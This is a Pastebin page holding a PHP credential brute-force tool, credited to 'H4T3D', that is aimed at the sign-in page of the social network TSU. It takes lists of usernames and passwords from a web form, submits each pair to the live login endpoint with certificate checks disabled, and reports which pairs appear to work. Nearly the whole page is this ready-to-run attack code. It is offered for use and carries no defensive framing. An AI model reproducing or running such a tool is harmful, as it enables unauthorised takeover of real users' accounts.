Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #########################################
- #TSU (Social Platform Like Facebook) Bruteforce
- #Coded By H4T3D
- #Can Check Large Number Of Emails and Passwords
- #Changing name wont make You Coder
- #img >> http://postimg.org/image/lihljiduj/
- #Tutorial >> https://youtu.be/_0jjgIMXhFA
- ###########################################
- ob_start();
- @set_time_limit(0);
- error_reporting(0);
- echo "
- <head>
- <form method='POST'>
- </head>
- <style>
- html, body{
- background:#000000;
- color:#00FF00;
- font-family:monospace;
- height: 100%;
- text-decoration: none;
- }
- textarea {
- background:#000000;
- resize:none;
- color: #00FF00 ;
- border:1px solid red ;
- border: 4px solid red ;
- }
- input {
- color: ##33CCFF;
- border:1px dotted #33CCFF;
- }
- </style>";
- echo "
- <center><h1>TSU - Priv8 BruteForce - H4T3D</h1></center>
- <p dir='ltr' align='center'>
- <textarea cols='22' class='area' rows='14' name='username' placeholder='username'></textarea>
- <textarea cols='22' class='area' rows='14' name='password' placeholder='password'></textarea><br>
- <br>
- <input type='submit' name='scan' value='Start BruT3Force'><br></p>";
- if(isset($_POST['scan'])){
- function brute($user,$pass){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://www.tsu.co/users/sign_in");
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "utf8=✓&authenticity_token=IHB/hEFaTk9ZLmoog236KJy8Qv14bmBvCXjehO0vqowvcoOZ4TpfXRaoHZpcDd0fd8yeBuJzVyZQdmcaDwT9MQ==&user[login]=$user&user[password]=$pass&user[remember_me]=1&commit=Sign In");
- curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
- $login = curl_exec($ch);
- $check = (eregi('HTTP/1.1 302 Found
- ',$login)) ? true:false;
- $check2 = (eregi('HTTP/1.1 503',$login)) ? true:false;
- if($check == true){
- echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It :) || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
- flush();@ob_flush(); }
- elseif($check2 == true){
- die ("<p align='center' dir='ltr'><font face='Arial Black' size='2'>Security Banned Please Remove Cookies and Try Again :(</font></p>");
- flush();@ob_flush(); }
- else{
- echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one -_- || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
- flush();@ob_flush(); }
- }
- $username = explode("\n", $_POST['username']);
- $password = explode("\n", $_POST['password']);
- foreach($username as $users) {
- $users = @trim($users);
- foreach($password as $pass) {
- $pass = @trim($pass);
- echo brute($users,$pass);
- }
- }
- }
- echo"<br>
- <br>
- <br>
- <br>
- <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded BY H4T3D http://pastebin.com/u/H4T3D</font></b></p></center>";
- ob_end_flush();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement